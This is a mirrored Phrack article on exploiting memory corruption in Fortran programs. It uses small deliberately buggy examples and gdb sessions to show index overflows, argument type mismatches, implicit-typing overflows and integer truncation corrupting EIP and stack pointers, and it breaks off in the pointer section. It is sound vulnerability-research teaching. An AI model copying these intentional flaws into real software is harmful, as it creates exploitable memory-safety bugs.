mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
2022 lines
73 KiB
Text
2022 lines
73 KiB
Text
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x43, Phile #0x0b of 0x10
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=--------=[ Exploiting memory corruptions in Fortran programs ]=--------=|
|
|
|=--------=[ under UNIX/VMS ]=--------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ by Magma /FHC ]=--------------------------=|
|
|
|=------------------------=[ magma@phrack.org ]=-------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
---
|
|
|
|
"aka hacking Fortran for kiddos"
|
|
|
|
---
|
|
|
|
--[ Contents
|
|
|
|
1 - Introduction
|
|
1.1 - A Fortran tale
|
|
1.2 - Who cares about Fortran anyway?
|
|
|
|
2 - A short introduction to the language basics
|
|
2.1 - An overview of Fortran syntax
|
|
2.2 - Hey Gramps, what's the difference between F77 and F2008?
|
|
|
|
3 - Memory corruption with gfortran
|
|
3.1 - Buffer overflows
|
|
3.2 - The number-related issues
|
|
3.3 - The POINTER abuse
|
|
3.4 - Other interesting bugs
|
|
|
|
4 - Back to the good ol' OpenVMS friend
|
|
4.1 - Common Fortran bugs .VS. OpenVMS
|
|
4.2 - Playing with the heap
|
|
|
|
5 - Prevention: lets use a condom
|
|
|
|
6 - The final words
|
|
|
|
7 - Greetz
|
|
|
|
8 - Bibliography
|
|
|
|
---
|
|
|
|
---[ 1 - Introduction
|
|
|
|
|
|
---[ 1.1 - A Fortran tale
|
|
|
|
Fortran -FORmula TRANslation- is one of the oldest high level programming
|
|
language ever created. Being well aware of the fact that youngsters aren't
|
|
interested anymore in history, I'll go straight to the point.
|
|
|
|
Fortran is .NOT. (yet) dead (though 'perforated cards' hackers probably
|
|
are). Not only did it remain actively used in the very underground
|
|
scientific/banking sectors but it also evolved to the point where it got
|
|
its last update in 2008. Hey son, you didn't know that, did you?
|
|
|
|
Now if you ever took Fortran classes in college/university then there is a
|
|
good chance that your teacher voluntary missed a few things as Fortran is
|
|
generally taught as a procedural programming language for beginners. As
|
|
such, you might have been asked to program some crappy math oriented
|
|
program with basic features and never really got the chance to play with
|
|
the interesting features of the language.
|
|
|
|
Fortran was once an old fashioned language with limited features and boring
|
|
syntax constraints. Forget about all that. Nowadays Fortran includes modern
|
|
features such as dynamic allocation and MPI which make it suitable for
|
|
implementing both complex algorithms and parallel computing. Now add that
|
|
to the fact that modern compilers exist for almost all common operating
|
|
systems and that they produce high-lol-ly efficient code which can be
|
|
linked to C and even Java programs. You can also use GTK or OpenGL if you
|
|
wish. You're impressed kid, I can see that in your eyes.
|
|
|
|
@(*_*)@
|
|
|
|
---[ 1.2 - Who cares about Fortran anyway?
|
|
|
|
Well I do and let me tell you why you should too:
|
|
|
|
a. It may not be too good looking at first but at least it's way sexier
|
|
than COBOL.
|
|
b. Your father was programming in Fortran using perforated cards and got
|
|
headaches doing so. Sounds like a cool subject in family diner.
|
|
c. Vintage web is the best. Just try typing Fortran in google to admire
|
|
beautiful and authentic Web 0.1 HTML.
|
|
d. Wikipedia tells us that "It is one of the most popular languages in
|
|
the area of high-performance computing and is the language used for
|
|
programs that benchmark and rank the world's fastest supercomputers."
|
|
We should always believe wikipedia.
|
|
e. You mastered tabs in python and couldn't think of new ways to be cool
|
|
on BBS^H^H^HIRC? Well then try to master Fortran 77's indentation
|
|
constraints. You might even be able to impress chicks. It used to
|
|
work almost forty years ago (.OR. .NOT.).
|
|
|
|
Still not convinced? OK so what if Fortran programs were used in strategic
|
|
areas you've only heard of? What if Fortran programs were more buggy [R1]
|
|
than they seemed? What if you could exploit some appropriate bug in a
|
|
Fortran program and then own the _whole_ _damn_ _world_? That would be
|
|
extraordinary, wouldn't it? Well cool down man that would also remain a
|
|
dream :>
|
|
|
|
---
|
|
|
|
---[ 2 - A short introduction to the language basics
|
|
|
|
In order to properly understand the paper, you'll need the basics in
|
|
Fortran programming. Since Fortran 77 (F77) isn't used anymore, the article
|
|
is focused on F90 (Fortran 90) whose syntax mostly remained compatible
|
|
throughout the different revisions of the standard. Specific features added
|
|
by Fortran 95 (F95) up to Fortran 2008 (F2008) are discussed in Chap 2.2
|
|
though not really _that_ interesting in the context of this paper. You can
|
|
easily skip the aforementioned explanation.
|
|
|
|
|
|
---[ 2.1 - An overview of Fortran syntax
|
|
|
|
Fortran is a procedural compiled language whose syntax is quite easy to
|
|
learn albeit sometimes not intuitive. Let's begin with the traditional
|
|
'Hello World':
|
|
|
|
-----BEGIN EXAMPLE 1-----
|
|
$ cat ex1.f90
|
|
! Dummy comment
|
|
PROGRaM EX1 [L1]
|
|
CHARACTER(len=20) :: hellostr='Hello World!' [L2]
|
|
write(*,fmt='(A)') hellOstr [L3]
|
|
END PROGRAM [L4]
|
|
$ gfortran ex1.f90
|
|
$ ./a.out
|
|
Hello World!
|
|
$
|
|
-----END EXAMPLE 1-----
|
|
|
|
*) '!' marks the beginning of a comment.
|
|
|
|
*) A Fortran program is divided in several blocks. [L1] declares the
|
|
beginning of the PROGRAM (the MAIN_() function) and requires the
|
|
according 'END' in [L4]. Other types of blocks include FUNCTION and
|
|
SUBROUTINE, the difference between them being essentially whether or
|
|
not they return a value.
|
|
|
|
Note: This language keywords are case insensitive as shown in [L1].
|
|
|
|
*) Variables are declared at the beginning of the blocks and are also
|
|
case insensitive ([L2] vs [L3]) and preceded by a type. According to
|
|
the ISO standard [R2], F90 defines five intrinsic types being:
|
|
INTEGER, REAL, COMPLEX, CHARACTER and LOGICAL.
|
|
|
|
An intrinsic type can optionally been followed by a 'type parameter'
|
|
which can either be 'len' or 'kind'. 'len' allows the programmer to
|
|
specify how much bytes is required to store the variable for a
|
|
CHARACTER and so is 'kind' for INTEGER, REAL and LOGICAL types.
|
|
|
|
Contrary to the C language, there is a difference between strings and
|
|
character arrays but both are related to the CHARACTER type:
|
|
|
|
CHARACTER(len=1) :: array(20) ! 20 bytes array
|
|
CHARACTER(len=20) :: string ! 20 bytes string
|
|
|
|
*) read() and write() are the common input/output functions used to read
|
|
and write files. Amongst the possible parameter, you can specify how
|
|
to format the variable. The code in [L3] is equivalent to the C line:
|
|
printf("%s\n", hellOstr);
|
|
|
|
Now let's see a more advanced example:
|
|
|
|
-----BEGIN EXAMPLE 2-----
|
|
$ cat ex2.f90
|
|
SUBROUTINE add(I,J)
|
|
IMPLICIT NONE [L1]
|
|
INTEGER(2) :: I [L2]
|
|
INTEGER(2) :: J
|
|
I = I + J
|
|
END SUBROUTINE
|
|
|
|
PROGRAM EX2
|
|
CHARACTER(len=20), PARAMETER :: s = & [L3]
|
|
'p67 will be the best.'
|
|
INTEGER*2 :: I = Z'FF' [L4]
|
|
write(*,*) '[1] Before add(), I = ', I
|
|
CALL add(I,1)
|
|
write(*,*) '[2] After add(), I = ', I
|
|
END PROGRAM
|
|
$ gfortran ex2.f90
|
|
$ ./a.out
|
|
[1] Before add(), I = 255
|
|
[2] After add(), I = 256 [L5]
|
|
$
|
|
-----END EXAMPLE 2-----
|
|
|
|
L1) By default a few variables do not need to be explicitly declared.
|
|
According to Chap 5.3 of [R2], variables I to N are integers, while
|
|
other variables are typed REAL. The directive 'IMPLICIT NONE'
|
|
forbids this behavior and forces the programmer to properly declare
|
|
every variable.
|
|
|
|
L2) I and J are both signed integers stored on 2 bytes ('short' type in
|
|
C language).
|
|
|
|
L3) Lines can be truncated using the '&' special character. PARAMETER is
|
|
used to declare the variable as a constant.
|
|
|
|
L4) You can initialize the variables in base 8 ('O'), 16 ('Z') and even
|
|
base 2 ('B').
|
|
|
|
L5) When calling functions and subroutines (which from an asm point of
|
|
view is the same), then arguments are passed by reference contrary
|
|
to the C where arguments are passed by value.
|
|
|
|
|
|
---[ 2.2 - Hey Gramps, what's the difference between F77 and F2008?
|
|
|
|
First of all, know that F77 is not the first Fortran at all but rather the
|
|
ancestor of F90. It can be seen as the skeleton of the actual "modern"
|
|
language. Decades after decades, the ISO published several revisions of the
|
|
language to bring new functionalities while sometimes deleting ones. For us
|
|
hackers, there is almost no impact except that the newer the language, the
|
|
higher the chance to find bugs thanks to dangerous and misused extensions.
|
|
|
|
Anyway you should nonetheless be aware of the following -important-
|
|
differences between the revisions:
|
|
|
|
*) Fortran 90 brought the POINTER object and the ability to dynamically
|
|
allocate objects. It also made possible the recursion. This
|
|
particular feature won't be discussed in this paper.
|
|
|
|
*) "Varying character strings" appeared in Fortran 95. This interesting
|
|
functionality can potentially reduce the risks of bugs induced by the
|
|
need to copy a buffer into another one (remember that strings have a
|
|
fixed len in Fortran). Fortunately some compilers don't support it
|
|
yet (like gfortran) and a lot of programmers aren't even aware of its
|
|
existence.
|
|
|
|
*) Fortran 2003 was designed to allow object oriented programming but
|
|
frankly speaking, we don't care at all. More interesting are the
|
|
IEEE floating point arithmetic and the so-called procedure pointers.
|
|
|
|
Note that we had to wait 2003 to get a language being able to deal
|
|
with command line arguments and environment variables. _ridiculous_
|
|
|
|
*) Fortran 2008 introduced the parallel processing ability in the
|
|
language. This will not discussed.
|
|
|
|
OK enough with the chitchat, let's move on.
|
|
|
|
---
|
|
|
|
---[ 3 - Memory corruption with gfortran
|
|
|
|
This part introduces the more common bugs that you may encounter while
|
|
auditing/writing Fortran code. While it is essentially focused on gfortran
|
|
(a GCC extension [R3]), the OpenVMS Fortran compiler [R4] will be discussed
|
|
in part 4. This will allow us to make at least partial generalisation of
|
|
what kind of bugs are likely to be found & exploited in the wild.
|
|
|
|
People accustomed to Fortran programming already know that Fortran is about
|
|
dealing with numbers (one of the main advantages of Fortran). As a result
|
|
it seems that interesting inputs will be the ones related to number
|
|
manipulation/conversion and string parsing. Now Gramps will show you a few
|
|
things that might interest you.
|
|
|
|
|
|
---[ 3.1 - Buffer overflows
|
|
|
|
Obviously the buffer overflow is the first type of bug that comes to mind
|
|
when one wants to trigger a bug related to strings/buffers. Luckily, they
|
|
also exist in Fortran but only in situations where the compiler was not
|
|
able to deter them. That would be:
|
|
|
|
*) when the user is able to manipulate an index which will be used to
|
|
access an array or a string. Due to the index provided by the user,
|
|
the compiler is not able to detect the potential memory corruptions
|
|
during the compilation.
|
|
|
|
*) when the user is implicitly or explicitly changing the type of an
|
|
object passed by reference to the function.
|
|
|
|
The index manipulation
|
|
----------------------
|
|
|
|
Contrary to other languages, Fortran is not able to properly handle invalid
|
|
memory access on runtime. In fact, if an index is out of scope, Fortran
|
|
will not see it and a memory corruption might appear.
|
|
|
|
Let's see using this tiny string manipulation example:
|
|
|
|
-----BEGIN OVERFLOW 1-----
|
|
$ cat overflow1.f90
|
|
PROGRAM test
|
|
CHARACTER(len=30) :: S ! String of length 30
|
|
INTEGER(4) I
|
|
|
|
S = 'Hello Phrack readers!'
|
|
read(*,*) I
|
|
S(I:I) = '.'
|
|
write(*,*) S
|
|
END PROGRAM
|
|
$ gfortran overflow1.f90
|
|
$ ./a.out
|
|
3
|
|
He.lo Phrack readers! <-- S was modified with 0x2E
|
|
$ gdb ./a.out
|
|
[...]
|
|
0x080487be <+186>: mov BYTE PTR [ebp+eax*1-0x2b],0x2e
|
|
; This is the memory write
|
|
; Do we really control eax?
|
|
[...]
|
|
(gdb) b *0x080487be
|
|
Breakpoint 1 at 0x80487be
|
|
(gdb) r
|
|
Starting program: a.out
|
|
50 <-- 50 is clearly out of scope! (>30)
|
|
|
|
Breakpoint 1, 0x080487be in MAIN__ ()
|
|
(gdb) print /d $eax
|
|
$1 = 50
|
|
(gdb) c
|
|
Hello Phrack readers!
|
|
|
|
Program received signal SIGSEGV, Segmentation fault.
|
|
0x2e04885b in ?? () <-- EIP was corrupted with 0x2E
|
|
-----END OVERFLOW 1-----
|
|
|
|
This short example is sufficient to prove that (at least with gfortran)
|
|
there is no runtime check at all. If the user is controlling the index used
|
|
to access a string then it's probably all over. There are two things worth
|
|
to note:
|
|
|
|
*) We tricked an out-of-bound memory write due to string manipulation
|
|
but this could very well have been the same thing with any array
|
|
(REAL, INTEGERS, CHARACTERS, etc.)
|
|
|
|
*) Due to the fact that the INTEGER type is 'signed', we are equally
|
|
able to write both before and after the buffer. Depending on the
|
|
situation this might be extremely useful. For example while it's
|
|
usually more interesting to write past the buffer when it's located
|
|
on the stack, writing before it (underflow) might be handy when it's
|
|
located on the heap. Of course that will depend on the situation.
|
|
|
|
Explicit typing of function parameters
|
|
------------------------------------
|
|
|
|
A short example is better than confusing explanations:
|
|
|
|
-----BEGIN CAST 1-----
|
|
$ cat cast1.f90
|
|
SUBROUTINE dump(S)
|
|
INTEGER(4) :: S
|
|
write(*,fmt='(Z10)') S
|
|
END SUBROUTINE
|
|
|
|
PROGRAM CAST
|
|
CHARACTER(len=6) :: S
|
|
S='ABCDEF'
|
|
CALL dump(S)
|
|
END PROGRAM
|
|
$ gfortran cast1.f90
|
|
$ ./a.out
|
|
44434241
|
|
-----END CAST 1-----
|
|
|
|
So we first declare S as a string in the MAIN_ and then call the dump()
|
|
subroutine, S being the argument. Inside dump(), the parameter is declared
|
|
as an INTEGER which results in the appropriate printing. The fact that the
|
|
compiler doesn't check types can lead to very interesting situations:
|
|
|
|
*) when the size of S object in dump() is known at compile time and
|
|
different of the original one.
|
|
|
|
*) when the size of S object in dump() is controlled by the user.
|
|
|
|
The first case will lead to a memory corruption if the size of the argument
|
|
in the function is superior to its real size due to argument being passed
|
|
by reference. The following code is for example incorrect and will lead to
|
|
a program crash:
|
|
|
|
-----BEGIN CAST 2-----
|
|
$ cat cast2.f90
|
|
SUBROUTINE dump(S)
|
|
CHARACTER(len=20) :: S
|
|
S = 'AAAA'
|
|
END SUBROUTINE
|
|
PROGRAM cast2
|
|
CHARACTER(len=10) :: X
|
|
X = 'ZZZZZZZZZZZ'
|
|
CALL dump(X)
|
|
END PROGRAM
|
|
$ gfortran ./cast2.f90
|
|
$ ./a.out
|
|
Segmentation fault
|
|
-----END CAST 2-----
|
|
|
|
What's happening? 'AAAA' is supposed to be shorter than 'ZZZZZZZZZZZ' so
|
|
why is there a crash? Well S = 'AAAA' means the initialisation of S which
|
|
ultimately results in the 4 first characters being set to 'A' and the other
|
|
16 ones to ' ' (space).
|
|
|
|
But remember that parameters are passed by reference in Fortran so whatever
|
|
the size of S during the execution of dump(), the size of the real object
|
|
is 10 bytes. In other words, 20 bytes were copied on a 10 bytes buffer. Due
|
|
to the very nature of this bug, it's quite unlikely to find it in the wild.
|
|
However a much more vicious variant with 'implicit typing' is described
|
|
later.
|
|
|
|
Note: If the size of the argument in the function is actually shorter and
|
|
number-related then it may leads to a truncation bug (discussed in Chap
|
|
3.2).
|
|
|
|
Now one could imagine a second case where the programmer is providing the
|
|
size of S as an argument (which is of course a bad practice in Fortran).
|
|
The following code is perfectly legal:
|
|
|
|
-----BEGIN CAST 3-----
|
|
$ cat cast3.f90
|
|
SUBROUTINE dump(S,L)
|
|
INTEGER(4) :: L
|
|
CHARACTER(len=L) :: S ! size is a runtime parameter
|
|
S='AAAA'
|
|
END SUBROUTINE
|
|
PROGRAM cast2
|
|
CHARACTER(len=10) :: X
|
|
X = 'ZZZZZZZZZZ'
|
|
CALL dump(X,100)
|
|
write(*,*) X
|
|
END PROGRAM
|
|
$ gfortran cast3.f90
|
|
$ ./a.out
|
|
10
|
|
AAAA
|
|
$ ./a.out
|
|
200
|
|
AAAA
|
|
Segmentation fault
|
|
$
|
|
-----END CAST 3-----
|
|
|
|
For a couple of seconds we could be tempted to think that it's a situation
|
|
similar to the one described in [R5] but that would only be true if there
|
|
were a stack allocation. In fact once again the bug is triggered by the
|
|
initialisation of the string. Because of the explicit typing of S, the
|
|
compiler is assuming that S really has a len of L and if L > 10 then a
|
|
memory corruption occurs.
|
|
|
|
Implicit typing
|
|
---------------
|
|
|
|
In the life-time of a program, declaring variables every time can be boring
|
|
especially when the use of these variables is limited (consider a DO loop
|
|
variable for example). Because of that, Fortran designers created a rule of
|
|
implicit declaration. As a result in Fortran you can use a few variables
|
|
without declaring them which for us hackers can be really cool as it can
|
|
have side effects. Here is a tiny buggy example:
|
|
|
|
-----BEGIN IMPLICIT TYPE 1-----
|
|
$ cat implicit_typing1.f90
|
|
SUBROUTINE set(I)
|
|
write(*,*) 'How much do u want to read dude ?'
|
|
read(*,*) I [L3]
|
|
END SUBROUTINE
|
|
|
|
PROGRAM IMPLICIT_TYPING
|
|
IMPLICIT NONE
|
|
INTEGER(1) :: A, B [L1]
|
|
A = 0
|
|
B = 0
|
|
CALL set(B) [L2]
|
|
write(*,*) 'A=',A,'B=',B
|
|
END PROGRAM
|
|
$ gfortran implicit_typing1.f90
|
|
$ ./a.out
|
|
How much do u want to read dude ?
|
|
1094795585 [L4]
|
|
A= 65 B= 65 [L5]
|
|
$
|
|
-----END IMPLICIT TYPE 1-----
|
|
|
|
A, B are declared INTEGERS in the range [-128,+127] [L1] and initialized.
|
|
B is then passed by reference to the set() subroutine [L2] where it gets
|
|
affected a new value [L3]. If the user supplies a large enough integer [L4]
|
|
then B is corrupted [L5]. What happened?
|
|
|
|
Well the heart of this corruption lies in the implicit typing associated
|
|
with the implicit declaration. Here is what can be read from the official
|
|
documentation [R2]:
|
|
|
|
---
|
|
Chap 5.3 - IMPLICIT
|
|
|
|
|
|
"In each scoping unit, there is a mapping, which may be null, between each
|
|
of the letters A, B, ..., Z and a type (and type parameters). An IMPLICIT
|
|
statement specifies the mapping for the letters in its letter-spec-list.
|
|
IMPLICIT NONE specifies the null mapping for all the letters. If a mapping
|
|
is not specified for a letter, the default for a program unit or an
|
|
interface body is default integer if the letter is I, J, ..., or N and
|
|
default real otherwise, and the default for an internal or module procedure
|
|
is the mapping in the host scoping unit."
|
|
---
|
|
|
|
So not declaring I in the set() subroutine had the effect of declaring it
|
|
as an integer which means INTEGER(4) by default (thus 4 bytes allocated).
|
|
So cool. Do not forget that we're passing arguments by reference! Yes I
|
|
know, I'm repeating myself. Probably because of my Alzheimer you know.
|
|
|
|
Anyway, It's really easy to watch it
|
|
|
|
-----BEGIN IMPLICIT TYPE 2-----
|
|
(gdb) disassemble MAIN__
|
|
[...]
|
|
0x080486c1 <+17>: lea esi,[ebp-0xa] ; esi=&B
|
|
[...]
|
|
0x080486d8 <+40>: mov DWORD PTR [esp],esi
|
|
0x080486db <+43>: mov BYTE PTR [ebp-0x9],0x0 ; A=0
|
|
0x080486df <+47>: mov BYTE PTR [ebp-0xa],0x0 ; B=0
|
|
0x080486e3 <+51>: call 0x8048790 <set_> ; set(&B)
|
|
(gdb) disassemble set_
|
|
[...]
|
|
0x08048826 <+150>: mov eax,DWORD PTR [ebp+0x8] ; eax=&B
|
|
0x08048829 <+153>: mov DWORD PTR [esp],ebx
|
|
0x0804882c <+156>: mov DWORD PTR [esp+0x8],0x4
|
|
0x08048834 <+164>: mov DWORD PTR [esp+0x4],eax
|
|
0x08048838 <+168>: call 0x8048594 [...] ; read(&B,4)
|
|
[...]
|
|
(gdb) b *0x080486e3
|
|
Breakpoint 1 at 0x80486e3
|
|
(gdb) r
|
|
[...]
|
|
Breakpoint 1, 0x080486e3 in MAIN__ ()
|
|
(gdb) x /x $ebp-0xa
|
|
0xbffff42e: 0xf5140000
|
|
(gdb) x /x $ebp-0xa+2
|
|
0xbffff430: 0xbffff514 <-- A pointer is stored right after B
|
|
(gdb) nexti
|
|
How much do u want to read dude ?
|
|
1094795585
|
|
0x080486e8 in MAIN__ ()
|
|
(gdb) x /x $ebp-0xa
|
|
0xbffff42e: 0x41414141 <-- We are controling &B[0] up to
|
|
&B[3]
|
|
(gdb) x /x $ebp-0xa+2
|
|
0xbffff430: 0xbfff4141 <-- The pointer is corrupted. Our win.
|
|
[...]
|
|
-----END IMPLICIT TYPE 2-----
|
|
|
|
As expected we wrote 4 bytes in a 1-byte buffer overwriting both 'B' and
|
|
the 2 lowest bytes of a pointer with arbitrary values.
|
|
|
|
|
|
---[ 3.2 - The number-related issues
|
|
|
|
In C language, there exists three types of integer related bugs [R6]:
|
|
1. Signedness bugs
|
|
2. Truncation bugs
|
|
3. Integer underflow/overflow bugs
|
|
|
|
What about in Fortran?
|
|
|
|
*) This first class of bugs is quite unlikely as the primary component
|
|
is missing. Indeed the 'unsigned' concept does not exist in Fortran
|
|
which means that there is (as far as I can see) almost no way to
|
|
mistakenly interpret a negative number (integer/real) as a larger
|
|
than expected positive one.
|
|
|
|
However what would appen if we were to call a function in another
|
|
language defining unsigned numbers like C? Then an integer overflow
|
|
_could_ happen if the argument was casted. This particular situation
|
|
is illustrated in Chap 4.
|
|
|
|
*) A truncation bug (may) occur when an integer variable is copied into
|
|
a smaller one. For example, in C copying an int (4 bytes) into a
|
|
short (2 bytes) which is possible in Fortran.
|
|
|
|
Practically speaking such a bug usually occurs when an INTEGER is
|
|
passed as an argument to a function/procedure which declares its type
|
|
'smaller' than it actually is.
|
|
|
|
-----BEGIN TRUNCATE 1-----
|
|
$ cat truncate3.f90
|
|
LOGICAL FUNCTION IsGood(L)
|
|
INTEGER(1) :: L
|
|
IsGood = .TRUE.
|
|
write(*,*) 'IsGood: size is ', L
|
|
IF (L > 10) THEN
|
|
write(*,*) 'Way too long man', L
|
|
IsGood = .FALSE.
|
|
RETURN
|
|
END IF
|
|
END FUNCTION
|
|
|
|
PROGRAM truncate3
|
|
IMPLICIT NONE
|
|
INTEGER(4) :: l
|
|
CHARACTER(2000) :: str
|
|
LOGICAL :: IsGood
|
|
write(*,*) 'Give me the damn string ...'
|
|
read(*,*) str
|
|
l = len_trim(str)
|
|
write(*,*) 'MAIN_: size is ', l
|
|
IF (IsGood(l) .EQV. .TRUE.) THEN
|
|
write(*,*) 'Copying bytes ... :)'
|
|
END IF
|
|
END PROGRAM
|
|
$ gfortran truncate3.f90
|
|
$ ./a.out
|
|
Give me the damn string ...
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
MAIN_: size is 38
|
|
IsGood: size is 38
|
|
Way too long man 38
|
|
$ ./a.out
|
|
Give me the damn string ...
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
MAIN_: size is 520
|
|
IsGood: size is 8
|
|
Copying bytes ... :)
|
|
$
|
|
-----END TRUNCATE 1-----
|
|
|
|
In IsGood(), L is declared as an INTEGER(1). To respect the type, the
|
|
parameter has to be reduced modulo 256 hence the result (520 & 0xFF
|
|
= 8).
|
|
|
|
This is _not_ the only situation involving this type of bug. For
|
|
example, consider the following situation:
|
|
|
|
-----BEGIN TRUNCATE 2-----
|
|
$ cat truncate2.f90
|
|
PROGRAM truncate2
|
|
IMPLICIT NONE
|
|
|
|
INTEGER(1) :: l
|
|
CHARACTER(255) :: str
|
|
CHARACTER(10) :: foo
|
|
|
|
write(*,*) 'Give me the damn string ...'
|
|
read(*,*) str
|
|
write(*,*) 'Real string size is ', len_trim(str)
|
|
|
|
l = len_trim(str) ! *BUG* *BUG* *BUG*
|
|
IF (l > 10) THEN
|
|
write(*,*) 'Way too long man', l
|
|
STOP
|
|
END IF
|
|
write(*,*) 'Copying bytes'
|
|
|
|
! Insecure copy(foo, str)
|
|
[...]
|
|
END PROGRAM
|
|
$ gfortran truncate2.f90
|
|
$ ./a.out
|
|
Give me the damn string ...
|
|
AAAAAAAAAAAAAAAAAA
|
|
Real string size is 18
|
|
Way too long man 18
|
|
$ ./a.out
|
|
Give me the damn string ...
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
|
|
Real string size is 180
|
|
Copying bytes
|
|
-----END TRUNCATE 2-----
|
|
|
|
In this situation, the programmer made a mistake involving the
|
|
prototype the len_trim() function (provided by the Fortran API). [R2]
|
|
specifies that the result returned by the function should be a
|
|
'default integer' (which means INTEGER(4)) hence the previous bug.
|
|
|
|
*) Whenever a language limits the amount of memory allocated for numbers
|
|
(generally because of hardware constraints), a number under/overflow
|
|
is always possible and is _normal_. However not handling this
|
|
situation _is_ a bug.
|
|
|
|
Fortran makes no exception as storage is clearly defined:
|
|
|
|
-----BEGIN INT OVERFLOW 1-----
|
|
$ cat arithmetic.f90
|
|
[...]
|
|
INTEGER(1) :: N1, N2
|
|
|
|
write(*,*) 'Give me a number (-128, +127) :'
|
|
read(*,*) N1
|
|
N2 = N1 * 16
|
|
write(*,*) 'N * 16 = ', N1*16, ' or ', N2
|
|
[...]
|
|
$ gfortran arithmetic.f90
|
|
$ ./a.out
|
|
Give me a number (-128, +127) :
|
|
5
|
|
N * 16 = 80 or 80
|
|
$ ./a.out
|
|
Give me a number (-128, +127) :
|
|
12
|
|
N * 16 = 192 or -64 <-- Oops :)
|
|
$ ./a.out
|
|
Give me a number (-128, +127) :
|
|
18
|
|
N * 16 = 288 or 32 <-- Oops (bis) :)
|
|
-----END INT OVERFLOW 1-----
|
|
|
|
Is that all? Not quite son. When auditing the use of numbers in C code,
|
|
you're usually focused on integers (char, int, long, long long) and that
|
|
would essentially be for two reasons:
|
|
|
|
*) Floats and double are rarely present in C code or to be fair, usually
|
|
not in common 'audited' software. Of course there are a few notable
|
|
exceptions, just use your imagination to find out which ones :)
|
|
|
|
*) Floats are usually _not_ related to copy or allocation operations. In
|
|
C, integers might be used as index, offsets, quantities or even sizes
|
|
and as such their abuse 'could' induce a memory corruption. There is
|
|
almost no such danger with floats.
|
|
|
|
Now consider that things are a little bit different with Fortran. As I told
|
|
you previously Fortran is a math oriented programming language. As such
|
|
REAL, and COMPLEX types are really common not to mention the fact that the
|
|
language itself provides some nice intrinsic functions to play with. This
|
|
itself is sufficient to increase the probability of float-related bug in
|
|
real life.
|
|
|
|
Here is a short example of what could happen:
|
|
|
|
-----BEGIN REAL OVERFLOW 1-----
|
|
$ cat float1.f
|
|
PROGRAM float1
|
|
REAL :: a, b, x
|
|
a = 9.7E-30
|
|
b = -3.9E-30
|
|
x = a * b
|
|
write(*,*) 'x = a*b = ',x
|
|
END PROGRAM
|
|
$ gfortran ./float1.f
|
|
$ ./a.out
|
|
x = a*b = -0.0000000
|
|
-----END REAL OVERFLOW 1-----
|
|
|
|
Interesting isn't it? The behavior of REAL is what is described in the
|
|
IEEE-754. As a result, a REAL (float) underflow occurs when a and b are
|
|
multiplied. This ultimately results in x taking the value 0 because of the
|
|
underflow. The program is not able to detect it on runtime whereas an
|
|
exception could/should have been generated. I won't say more about that,
|
|
now use your brain/imagination/drug to go further ;-)
|
|
|
|
|
|
---[ 3.3 - The POINTER abuse
|
|
|
|
While the concept of pointer is somewhat universal, implementations and
|
|
intrinsic limits of this object may completely vary from a language to
|
|
another. For example, while in C you have direct access to the memory, in
|
|
Fortran you don't (at least directly). But you still have a powerful
|
|
pointer arithmetic and frankly speaking, that's all needs the programmer to
|
|
introduce bugs ;-). Now let's talk about the POINTER.
|
|
|
|
Note: The POINTER is F90 & later specific but you might find pointers in a
|
|
few F77 programs which use 'Cray Pointers' [R10].
|
|
|
|
Introduction to POINTER
|
|
-----------------------
|
|
|
|
In Fortran, a pointer is not a data type but rather a type parameter and
|
|
must be associated with an object of the same type to read/modify it.
|
|
|
|
Here is a short self-explaining example:
|
|
|
|
-----BEGIN POINTER 1-----
|
|
$ cat pointer1.f90
|
|
PROGRAM pointer1
|
|
INTEGER, TARGET :: a
|
|
INTEGER, POINTER :: p_a
|
|
p_a => a ! p_a = &a
|
|
p_a = 1 ! *p_a = 1
|
|
write(*,*) a
|
|
a = 2
|
|
write(*,*) p_a ! printf("%d",*p_a)
|
|
END PROGRAM
|
|
$ gfortran pointer1.f90
|
|
$ ./a.out
|
|
1
|
|
2
|
|
-----END POINTER 1-----
|
|
|
|
Note that the TARGET parameter is mandatory. Now let's see a more complete
|
|
example:
|
|
|
|
-----BEGIN POINTER 2-----
|
|
$ cat pointer2.f90
|
|
PROGRAM pointer2
|
|
INTEGER, POINTER :: p_a(:)
|
|
INTEGER, POINTER, DIMENSION(:) :: p_b
|
|
INTEGER, ALLOCATABLE :: c(:)
|
|
INTEGER, POINTER :: X(:)
|
|
ALLOCATE(p_a(5)); p_a = 5
|
|
ALLOCATE(p_b(4)); p_b = 4
|
|
ALLOCATE(c(3)); c = 3
|
|
X => p_a
|
|
X(3) = 0
|
|
write(*,*) p_a
|
|
write(*,*) p_b
|
|
write(*,*) c
|
|
DEALLOCATE(p_a)
|
|
DEALLOCATE(p_b)
|
|
DEALLOCATE(c)
|
|
END PROGRAM
|
|
$ gfortran pointer2.f90
|
|
